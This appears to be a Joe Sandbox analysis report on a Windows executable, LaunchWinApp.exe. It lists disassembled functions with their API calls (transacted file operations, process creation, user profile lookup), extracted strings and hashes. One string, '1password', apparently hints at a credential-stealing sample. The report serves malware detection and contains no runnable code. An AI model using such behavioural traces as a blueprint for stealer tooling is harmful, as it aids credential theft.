                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: bc70cc94939164da42b383e9f8a183c316e1bd586dfc4a72650dc6d873fd97b8
                    • Instruction ID: 5ff0dd6b684c4b28ed6d1966f3dd4f07dd2899640299badcd31ccb30484a495c
                    • Opcode Fuzzy Hash: bc70cc94939164da42b383e9f8a183c316e1bd586dfc4a72650dc6d873fd97b8
                    • Instruction Fuzzy Hash: 6E210A71640219BFAF20AF668C95D6BB79DEF043A8710415FF819D7241F738EC4087AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 141a7fdb0bb5afcf60033019517a12fe1f01eac051aebdc837d44dcec4ac5088
                    • Instruction ID: a63fc8a93c7893814d4dcd6f956c97f38f82f86a765a7ea4bb2c2ba4c70486d4
                    • Opcode Fuzzy Hash: 141a7fdb0bb5afcf60033019517a12fe1f01eac051aebdc837d44dcec4ac5088
                    • Instruction Fuzzy Hash: F221C271200255BFAB20AF668C82E6B77ACEF0036E710451BFC14D7262E738DC0487A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrlenA.KERNEL32(?,?,74E069A0,?,?), ref: 00435EB0
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0,?,?), ref: 00435ECF
                    • lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0,?,?), ref: 00435EF2
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 00435F1E
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$lstrcpylstrlen
                    • String ID:
                    • API String ID: 3705784190-0
                    • Opcode ID: 51793920f76ccee685e26378a8dd596dbc07dac3cdea1a8cfb7f11c89da81908
                    • Instruction ID: edb364eecb3085cef133306fc744d5b3da0bb9b56a3888e0db402e19f4e06936
                    • Opcode Fuzzy Hash: 51793920f76ccee685e26378a8dd596dbc07dac3cdea1a8cfb7f11c89da81908
                    • Instruction Fuzzy Hash: 45216275914104BFEB199F65CC0AABFBBF9EF48300F14446EF841D6250EAB49D40DB15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                    • _free.LIBCMT ref: 0045A231
                    • _free.LIBCMT ref: 0045A267
                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID:
                    • API String ID: 2283115069-0
                    • Opcode ID: d2c0a84465fa14096fa0018bd98a369187cc0d9e38016dc7fa64ae45e8b9ee8f
                    • Instruction ID: 69d46a2496cad9b13188d732fad222f35c6c6cc2cf85ab1a3ee759019ed8f619
                    • Opcode Fuzzy Hash: d2c0a84465fa14096fa0018bd98a369187cc0d9e38016dc7fa64ae45e8b9ee8f
                    • Instruction Fuzzy Hash: E51194362057012EDA11366A5C86D2F21599B81BABF24073FFD14A22D3EE7A4C5D826E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004394FD
                    • CreateProcessA.KERNEL32 ref: 00439588
                    • CloseHandle.KERNEL32(?), ref: 00439591
                    • CloseHandle.KERNEL32(?), ref: 0043959A
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateFileModuleNameProcess
                    • String ID:
                    • API String ID: 2820832629-0
                    • Opcode ID: fec3de1c30e6626e5da260104415c338975dbd676741290c4a5f8ae47dd2086d
                    • Instruction ID: 44268445b66b83fc3bbc0042d26f427a3eed76195accdce52e64f691c07a29ce
                    • Opcode Fuzzy Hash: fec3de1c30e6626e5da260104415c338975dbd676741290c4a5f8ae47dd2086d
                    • Instruction Fuzzy Hash: DB2183B2D0024CBBEB019BA4DC85EEEB7BCFF59304F005166F649A1021E6B05A89CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32(0043FE4F,0043FE4F,00000002,0044C429,0045A464,00000000,?,00441C9B,00000002,00000000,?,tI3iZ,?,0040A956,0043FE4F,00000004), ref: 0045A32B
                    • _free.LIBCMT ref: 0045A388
                    • _free.LIBCMT ref: 0045A3BE
                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00441C9B,00000002,00000000,?,tI3iZ,?,0040A956,0043FE4F,00000004,00000000,00000000,00000000), ref: 0045A3C9
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID:
                    • API String ID: 2283115069-0
                    • Opcode ID: 02979d01aef258fdcfb41811417ae51d2abc8c5c839b28e3d5b33dbd124a64d2
                    • Instruction ID: 4899d002d60eae1842b1a0fd32e6454381a62c5752b808faeb64d1d0e6edf3f3
                    • Opcode Fuzzy Hash: 02979d01aef258fdcfb41811417ae51d2abc8c5c839b28e3d5b33dbd124a64d2
                    • Instruction Fuzzy Hash: 1711C6362053002ED611267A9C85D1F265A9BC1B7FB24073EFD14A22D3DE798C1D922E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 00429861
                    • CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00429887
                    • CommitTransaction.KTMW32(00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00429892
                    • RollbackTransaction.KTMW32(00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042989A
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Transaction$CommitCopyCreateFileRollbackTransacted
                    • String ID:
                    • API String ID: 2868256026-0
                    • Opcode ID: 5c38c54def7fba41ee2ffc0eb5ee551381773ecc562f7573684a47b1b9dad428
                    • Instruction ID: 17749bc364ff8988b1aa1c107f5af9b91acab172e3a675f977a52a46f3b32ea5
                    • Opcode Fuzzy Hash: 5c38c54def7fba41ee2ffc0eb5ee551381773ecc562f7573684a47b1b9dad428
                    • Instruction Fuzzy Hash: 02F0A475320120BFF7146A59AC88DB736ACDB47361B540526FD12C72D0E7A19C8186BA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WideCharToMultiByte.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000000,?,?,?,004147B9,?,?,?,00000000), ref: 0043F615
                    • GetLastError.KERNEL32(?,?,?,004147B9,?,?,?,00000000,00000000,?,?,00000007), ref: 0043F621
                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,004147B9,?,?,?,00000000), ref: 0043F647
                    • GetLastError.KERNEL32(?,?,?,004147B9,?,?,?,00000000,00000000,?,?,00000007), ref: 0043F653
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide
                    • String ID:
                    • API String ID: 203985260-0
                    • Opcode ID: 6956984baba360ce7be0428b5fee7f092daa5826fbadb9959eeb11310f0e1b87
                    • Instruction ID: e1769066f3996d3e272e75d40c544a175d115fdb6cbdfd5993cfd9dbca1e8b28
                    • Opcode Fuzzy Hash: 6956984baba360ce7be0428b5fee7f092daa5826fbadb9959eeb11310f0e1b87
                    • Instruction Fuzzy Hash: 3F016236A00159BBCF220F96DC09C9B3E6AEBE97A0F004035FE0555230D671C823EBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 00416A05
                    • CreateDirectoryTransactedA.KERNEL32 ref: 00416A1E
                    • CommitTransaction.KTMW32(00000000,?,00000000,00000000), ref: 00416A29
                    • RollbackTransaction.KTMW32(00000000,?,00000000,00000000), ref: 00416A31
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Transaction$Create$CommitDirectoryRollbackTransacted
                    • String ID:
                    • API String ID: 629542334-0
                    • Opcode ID: 5eccc0dd450be8841c3cea339a640bd46fbb7ccd473ca07b6b6c0ac3a07a9dcf
                    • Instruction ID: e8c073272cbab2d3ff18bfab8a53dace8d0082a8ccfc4210a1f335fb7fb0d78a
                    • Opcode Fuzzy Hash: 5eccc0dd450be8841c3cea339a640bd46fbb7ccd473ca07b6b6c0ac3a07a9dcf
                    • Instruction Fuzzy Hash: 6EF0B471100114BFE610175E9D8CCA77AACDF463F57110622F922A32D0EAA0DCC186B6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA0F
                    • DeleteFileTransactedA.KERNEL32 ref: 0040CA26
                    • CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA31
                    • RollbackTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA39
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
                    • String ID:
                    • API String ID: 3802493581-0
                    • Opcode ID: 52a705e1ab0a63daa496820a83161973e72f4b057a9e73aa095895207cd0a512
                    • Instruction ID: 047adbc7aab856705940c154fe49f07b4c4bf1216ba82bf0ec8d8ed9166a6ce6
                    • Opcode Fuzzy Hash: 52a705e1ab0a63daa496820a83161973e72f4b057a9e73aa095895207cd0a512
                    • Instruction Fuzzy Hash: 5DF0B471200114FFDA20976D9C48E2736ACDB857307100736FC12E32D0E7B45C41CA7A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 0042B024
                    • RemoveDirectoryTransactedA.KERNEL32 ref: 0042B03B
                    • CommitTransaction.KTMW32(00000000,?,00000000), ref: 0042B046
                    • RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042B04E
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
                    • String ID:
                    • API String ID: 1201024725-0
                    • Opcode ID: b605264771e57ec225c76b56247dfa6c93aaa250ad71c25504b54b918c369c2b
                    • Instruction ID: 22db9db34b4bd88df0826ee3b4b6ca173227cd5139a8a207a57c94182e11ac00
                    • Opcode Fuzzy Hash: b605264771e57ec225c76b56247dfa6c93aaa250ad71c25504b54b918c369c2b
                    • Instruction Fuzzy Hash: 02F0B471200120FFDA200B6AAC0DD2737ACEB467707500626FE22C72D0E7A45C4186BA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCurrentProcess.KERNEL32(00020008,?), ref: 00436025
                    • OpenProcessToken.ADVAPI32(00000000), ref: 0043602C
                    • GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 0043603E
                    • CloseHandle.KERNEL32(?,?,00000200), ref: 0043604B
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
                    • String ID:
                    • API String ID: 1246687928-0
                    • Opcode ID: 11530ab6dfcf60f95a2848e619c1502c7b68d707d2ac4d09d7cfa0316c3cfc0a
                    • Instruction ID: 8f4e6d23ff46e6daab2ebf7604d2076cb9adc6ea422dd68d0d57ba94d4308a7a
                    • Opcode Fuzzy Hash: 11530ab6dfcf60f95a2848e619c1502c7b68d707d2ac4d09d7cfa0316c3cfc0a
                    • Instruction Fuzzy Hash: 11F08CB1514219BFEB109BA2DC4AEAE3BBDEB09340F100475E902E2120F6B4DE049A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00463F52,00000000,00000001,00000000,00000000,?,00457ACE,?,?,00000000), ref: 00467502
                    • GetLastError.KERNEL32(?,00463F52,00000000,00000001,00000000,00000000,?,00457ACE,?,?,00000000,?,00000000,?,0045801A,00000000), ref: 0046750E
                      • Part of subcall function 004674D4: CloseHandle.KERNEL32(FFFFFFFE,0046751E,?,00463F52,00000000,00000001,00000000,00000000,?,00457ACE,?,?,00000000,?,00000000), ref: 004674E4
                    • ___initconout.LIBCMT ref: 0046751E
                      • Part of subcall function 00467496: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004674C5,00463F3F,00000000,?,00457ACE,?,?,00000000,?), ref: 004674A9
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00463F52,00000000,00000001,00000000,00000000,?,00457ACE,?,?,00000000,?), ref: 00467533
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: be9cbdeb988518da23ecc76c7a34469ba7069b3b62c582f8f39ad8142bc26a0b
                    • Instruction ID: a49bc6428f3961b047b4cfb8b161e4ef5e12f34f7be912ba5df54bccf526a1fb
                    • Opcode Fuzzy Hash: be9cbdeb988518da23ecc76c7a34469ba7069b3b62c582f8f39ad8142bc26a0b
                    • Instruction Fuzzy Hash: 94F03036404118BBCF222F96EC08D8E3F66FB483A5B454466FA1995571FA7288209BDA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateSymbolicLinkW.KERNEL32(?,?,?,?,0043F836,?,?,00000000,?,00416382,?,?), ref: 0043F41B
                    • GetLastError.KERNEL32(?,0043F836,?,?,00000000,?,00416382,?,?), ref: 0043F425
                    • CreateSymbolicLinkW.KERNEL32(?,?,?,?,0043F836,?,?,00000000,?,00416382,?,?), ref: 0043F439
                    • GetLastError.KERNEL32(?,0043F836,?,?,00000000,?,00416382,?,?), ref: 0043F443
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastLinkSymbolic
                    • String ID:
                    • API String ID: 191780330-0
                    • Opcode ID: 63d7d28df5b63d215a8b64c4c31ec7c17c20a2a3711c160f5d296b3272486d3c
                    • Instruction ID: ecf2b820788bd03b273db7c898cadb72a10ad0fae9d3753eb15ad6765cd9ce0f
                    • Opcode Fuzzy Hash: 63d7d28df5b63d215a8b64c4c31ec7c17c20a2a3711c160f5d296b3272486d3c
                    • Instruction Fuzzy Hash: ACE0ED35500149EFEF015F95EC49D5B3BA5BB34715B108421F819A1121D7718865AA6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 004553BE
                      • Part of subcall function 0045813E: HeapFree.KERNEL32(00000000,00000000,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?), ref: 00458154
                      • Part of subcall function 0045813E: GetLastError.KERNEL32(?,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?,?), ref: 00458166
                    • _free.LIBCMT ref: 004553D1
                    • _free.LIBCMT ref: 004553E2
                    • _free.LIBCMT ref: 004553F3
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 2eb3980461a139c838a12933dd8749c0b357224b47e71266e8d464f30ba649df
                    • Instruction ID: cc534e50669d03abe8a9d5ceeebe31a33248f96f6e260ce9ce2c90e8e91de78b
                    • Opcode Fuzzy Hash: 2eb3980461a139c838a12933dd8749c0b357224b47e71266e8d464f30ba649df
                    • Instruction Fuzzy Hash: 4BE08670C076209A8A01AF11BD0188EBF26F754F54750082FF89022AB6CF354413DB8C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: Gard$ZoGard
                    • API String ID: 3519838083-3047177976
                    • Opcode ID: f4ee975e8a6710c4ac2120d9c08ef393e9ed39942866f69be42a89467e4a996b
                    • Instruction ID: 91d12020a773591fc39ab6ce2f59e6579687a89ca79167943ecda0e754f68535
                    • Opcode Fuzzy Hash: f4ee975e8a6710c4ac2120d9c08ef393e9ed39942866f69be42a89467e4a996b
                    • Instruction Fuzzy Hash: 02A14BB1E00219DFCB14DF99D580ADEBBF1BF08304F64416EE445AB241DB79AA49CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 004532BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: ffa18fa160b94d3e928a64741549721c064601d8526da00ac720a69dc92addcd
                    • Instruction ID: becc00934fa5cd00972b8da59cb78858fe66197c106de27d9c35932110c9f096
                    • Opcode Fuzzy Hash: ffa18fa160b94d3e928a64741549721c064601d8526da00ac720a69dc92addcd
                    • Instruction Fuzzy Hash: BC5118A1A04602A6CB117F14C90136B6794EB40793F30497BFCD5463ABEB2D8ADD9A4F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00419173
                      • Part of subcall function 004360CE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 0043611A
                      • Part of subcall function 00435C2D: __EH_prolog.LIBCMT ref: 00435C32
                      • Part of subcall function 00435C2D: _strcat.LIBCMT ref: 00435C8D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog$EnvironmentVariable_strcat
                    • String ID: /:$1password
                    • API String ID: 3009225943-4104749049
                    • Opcode ID: a69bccc6f4823ed382590e4b4ca436898eacfb8bc5e654ada64c60906e745fcb
                    • Instruction ID: bb09c6a66ebbe5126caed9f279bf567a729386df138ccbc0ac84066580e3fce8
                    • Opcode Fuzzy Hash: a69bccc6f4823ed382590e4b4ca436898eacfb8bc5e654ada64c60906e745fcb
                    • Instruction Fuzzy Hash: 9651C171D05249DACF04EFE9D4A15EEBBB1AF19304F24946ED80137342EB781B49CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Windows\SysWOW64\LaunchWinApp.exe
                    • API String ID: 0-1137754122
                    • Opcode ID: c827341752422e64363cb874ab1a94958e778a2a1f8d351f1950540f3c5323c1
                    • Instruction ID: 5d99d1491331256017dc35e721ae33a7e6d55248c937d5b5ea4d3564f748dfb5
                    • Opcode Fuzzy Hash: c827341752422e64363cb874ab1a94958e778a2a1f8d351f1950540f3c5323c1
                    • Instruction Fuzzy Hash: 3B41A7B1E00254ABDB11EB99DC819AFBBB8EFC5359F10006BE804DB352D7744A85C758
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426212
                    • is_contiguous, xrefs: 00426217
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$is_contiguous
                    • API String ID: 3519838083-1910854552
                    • Opcode ID: 3eca3036cd9515d6a1597a4c8e912d25aaf5d7d448f9e55ebcda214e34e80e04
                    • Instruction ID: 8c4998134e974a232d9e1a03f58385bb1cd38436996efc69c749a39a1cd57789
                    • Opcode Fuzzy Hash: 3eca3036cd9515d6a1597a4c8e912d25aaf5d7d448f9e55ebcda214e34e80e04
                    • Instruction Fuzzy Hash: 824124B1E042499FCB08DFA8D5406AEFBF1EF49300B25C0AED859E7341D7749941CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00444461
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
                    • Opcode ID: 6d8c45f86c68df9660d4f66f21dd8fcdae06b1982ad5ba15781dd7584bd41598
                    • Instruction ID: b88cd35fc5f179f5f636914fa6cacad5792dff393ebf0db12a4521d697e8c7d8
                    • Opcode Fuzzy Hash: 6d8c45f86c68df9660d4f66f21dd8fcdae06b1982ad5ba15781dd7584bd41598
                    • Instruction Fuzzy Hash: 5F414971900109AFEF16DF98CD81BAEBBB5BF88304F14805AFA1567251D3399A50DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0041B7C0
                      • Part of subcall function 0041B913: __EH_prolog.LIBCMT ref: 0041B918
                      • Part of subcall function 0041B6BF: __EH_prolog.LIBCMT ref: 0041B6C4
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                      • Part of subcall function 0041B68A: std::exception::exception.LIBCONCRT ref: 0041B6AB
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog$Deallocatestd::exception::exception
                    • String ID: parse error$parse_error
                    • API String ID: 3877490255-1820534363
                    • Opcode ID: 56efb09c3b9af0f7d51859861ab4592f0f6071c54c98832e4109ac9a6c82395a
                    • Instruction ID: b92f79fc419b7b4fff78366e709b6ef9e49e24fdc98f8d346d005118b56e156c
                    • Opcode Fuzzy Hash: 56efb09c3b9af0f7d51859861ab4592f0f6071c54c98832e4109ac9a6c82395a
                    • Instruction Fuzzy Hash: AD414A70D00258EECB14EFA5C841ADDBBB4BF58308F10806EE505B3241DB791B89CF5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog2
                    • String ID: ", "$: "
                    • API String ID: 1857396960-747220369
                    • Opcode ID: 24c075a4d3f59043fbfaf84855048f39c9093190b9a1a22584be1efc8a000c4c
                    • Instruction ID: 0c5daafeb64f308c71ec4e41247dc60d1de8812f909f0841cbb2bbb45fe14e5a
                    • Opcode Fuzzy Hash: 24c075a4d3f59043fbfaf84855048f39c9093190b9a1a22584be1efc8a000c4c
                    • Instruction Fuzzy Hash: 8931C371A01204AFCB14EF55D942BEEBBB6EF88704F10416FE501A7282DB786E44CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00425CDC
                    • object != nullptr, xrefs: 00425CE1
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                    • API String ID: 3519838083-2355325030
                    • Opcode ID: f34ada4d3396985d0757c15e633d499baace0adb93d5bca2e6c5a18f2781f7e7
                    • Instruction ID: 281599164418e76299791b603bf0904bbd9bfe90bff2a30576b8a26cde73192c
                    • Opcode Fuzzy Hash: f34ada4d3396985d0757c15e633d499baace0adb93d5bca2e6c5a18f2781f7e7
                    • Instruction Fuzzy Hash: D631E071B00B169BC711DF6AD191A6ABBB0AF05308F14812FD546A7B01E779AA40CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0041B918
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeallocateH_prolog
                    • String ID: at line $, column
                    • API String ID: 3708980276-191570568
                    • Opcode ID: be32b6fa57177b444a810ab66664a341ad51fe8673630ed6475510f98cd95f1a
                    • Instruction ID: 16f1584564fd2364165062dacf31d5a761b9d75e4a52b53f9cf85d007d8cb2a1
                    • Opcode Fuzzy Hash: be32b6fa57177b444a810ab66664a341ad51fe8673630ed6475510f98cd95f1a
                    • Instruction Fuzzy Hash: 2C2190B1900118DECB05EF96C8919EEFB78EF94318F40402FE042A3242DB782A49CB65
